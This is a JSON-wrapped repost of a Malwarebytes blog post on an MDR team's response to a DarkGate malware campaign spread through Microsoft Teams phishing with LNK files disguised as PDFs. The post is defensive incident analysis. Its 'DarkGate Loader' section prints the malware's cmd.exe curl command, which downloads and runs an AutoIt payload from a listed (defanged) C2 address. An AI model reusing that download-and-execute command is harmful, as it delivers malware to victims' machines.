{"id":23200,"date":"2023-10-30T08:37:31","date_gmt":"2023-10-30T16:37:31","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2023\/10\/30\/news-16930\/"},"modified":"2023-10-30T08:37:31","modified_gmt":"2023-10-30T16:37:31","slug":"news-16930","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/10\/30\/news-16930\/","title":{"rendered":"Battling a new DarkGate malware campaign with Malwarebytes MDR"},"content":{"rendered":"<p>First publicly reported in 2018,<a href=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2023\/08\/darkgate-reloaded-via-malvertising-campaigns\"> DarkGate is a Windows-based malware<\/a> with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, <a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/09\/microsoft-teams-used-to-deliver-darkgate-loader-malware\">researchers at Trusec found evidence<\/a> of a campaign using external Teams messages to deliver the DarkGate Loader.<\/p>\n<p>On September 13th, 2023, the <a href=\"https:\/\/www.malwarebytes.com\/business\/managed-detection-and-response\">Malwarebytes MDR <\/a>team spotted the same campaign on a client network.<\/p>\n<h2>The Initial Incident<\/h2>\n<p>The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named &#8220;<strong>C_onfidential Sign_ificant Company Changes.zip<\/strong>&#8221; (the names may vary in different iterations of the attack).<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/10\/easset_upload_file88789_284158_e.png\" alt=\"\" width=\"1400\" height=\"847\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/>Phishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec<\/p>\n<p>A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.<\/p>\n<p>The names of these LNK files included &#8220;<strong>EMPLOYEES_AFFECTED_BY_TRANSITION.PDF.LNK&#8221;<\/strong> and &#8220;<strong>COMPANY_TRANSFORMATIONS.PDF.LNK<\/strong>&#8220;.<\/p>\n<h2>The Malicious Command<\/h2>\n<p>When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a &#8216;Known bad&#8217; destination and blocked it.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/10\/easset_upload_file5883_284158_e.png\" alt=\"\" width=\"1136\" height=\"582\" \/><\/p>\n<p style=\"text-align: center;\">Multiple attempts to execute processes such as curl commands<\/p>\n<h2>DarkGate Loader &#8211; The Culprit<\/h2>\n<p>As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known malware attack campaign using Teams phishing to install DarkGate Loader. The use of the curl command is to fetch and deposit malicious files onto the victim&#8217;s machine:<\/p>\n<pre>\"C:WindowsSystem32cmd.exe\" \/k curl -# -o<br \/><br \/>\"C:Users[Redacted]AppDataLocalTempAutoit3.exe\" \"<br \/><br \/><a href=\"http:\/\/5\">http:\/\/5<\/a>[.]188[.]87[.]58:2351\" -o<br \/><br \/>\"C:Users[Redacted]AppDataLocalTempbtbgvbyy.au3\"<br \/><br \/>\"<a href=\"http:\/\/5\">http:\/\/5<\/a>[.]188[.]87[.]58:2351\/msibtbgvbyy\" \"C:Users[Redacted]AppDataLocalTempAutoit3.exe\"<br \/><br \/>\"C:Users[Redacted]AppDataLocalTempbtbgvbyy.au3\" &amp; exit<\/pre>\n<p>The malicious command attempts to run an AutoIt script (<strong>btbgvbyy.au3<\/strong>). Director of Threat Intelligence Jerome Segura notes the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/10\/easset_upload_file29226_284158_e.png\" alt=\"\" width=\"1445\" height=\"494\" \/><\/p>\n<p style=\"text-align: center;\">Malwarebytes EDR recognizing suspicious AutoIt activity<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/10\/easset_upload_file5210_284158_e.png\" alt=\"\" width=\"456\" height=\"492\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p style=\"text-align: center;\">Infected system exhibiting Indicators of Compromise (IOCs)<\/p>\n<p>Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.<\/p>\n<h2>Actions Taken<\/h2>\n<p>Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.<\/p>\n<p>The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.<\/p>\n<h2>Lessons from the Incident<\/h2>\n<p>By using a combination of&nbsp;evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.<\/p>\n<p>Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate&nbsp;malware and safeguarded the customer&rsquo;s digital environment against possible reinfection.<\/p>\n<p>Learn more about how Malwarebytes MDR today can help secure your organization:&nbsp;<a href=\"https:\/\/try.malwarebytes.com\/mdr-consultation-new\/\">https:\/\/try.malwarebytes.com\/mdr-consultation-new\/<\/a><\/p>\n<p style=\"text-align: center;\"><span class=\"blue-cta-bttn\" style=\"color: #ffffff;\"><a href=\"https:\/\/try.malwarebytes.com\/mdr-consultation-new\/\" style=\"color: #ffffff;\">Get a&nbsp;Malwarebytes MDR quote<\/a><\/span><\/p>\n<p>Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:<\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/05\/tracking-down-a-trojan-an-inside-look-at-threat-hunting-in-a-corporate-network\">Tracking down a trojan: An inside look at threat hunting in a corporate network<\/a><\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/06\/understanding-ransomware-reinfection-an-mdr-case-study\">Understanding ransomware reinfection: An MDR case study<\/a><\/p>\n<h2>Indicators of Compromise (IoC)<\/h2>\n<h3>File Details:<\/h3>\n<pre>Filename: C_onfidential Sign_ificant Company Changes.zip<br \/><br \/>Reported At: 09\/13\/2023 9:57:56 AM<\/pre>\n<h3>Network Indicators:<\/h3>\n<pre>C2 IP Address: 5[.]188[.]87[.]58<\/pre>\n<h3>Malicious URLs:<\/h3>\n<pre><a href=\"http:\/\/5\">http:\/\/5<\/a>[.]188[.]87[.]58:2351<br \/><br \/><a href=\"http:\/\/5\">http:\/\/5<\/a>[.]188[.]87[.]58:2351\/msibtbgvbyy<\/pre>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/10\/on-the-frontlines-battling-an-in-the-wild-darkgate-infection-with-malwarebytes-mdr\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<table cellpadding=\"10\">\n<tr>\n<td valign=\"top\" align=\"left\">\n<p>Categories: <a href=\"https:\/\/www.malwarebytes.com\/blog\/category\/business\" rel=\"category tag\">Business<\/a><\/p>\n<p>On September 13th, 2023, the Malwarebytes MDR team spotted a new DarkGate malware campaign on a client network.  <\/p>\n<table width=\"100%\">\n<tr>\n<td align=\"right\">\n<p><b>(<a href=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/10\/on-the-frontlines-battling-an-in-the-wild-darkgate-infection-with-malwarebytes-mdr\" title=\"Battling a new DarkGate malware campaign with Malwarebytes MDR \">Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/10\/on-the-frontlines-battling-an-in-the-wild-darkgate-infection-with-malwarebytes-mdr\">Battling a new DarkGate malware campaign with Malwarebytes MDR <\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/www.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[1001],"class_list":["post-23200","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-business"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/23200","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=23200"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/23200\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=23200"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=23200"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=23200"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}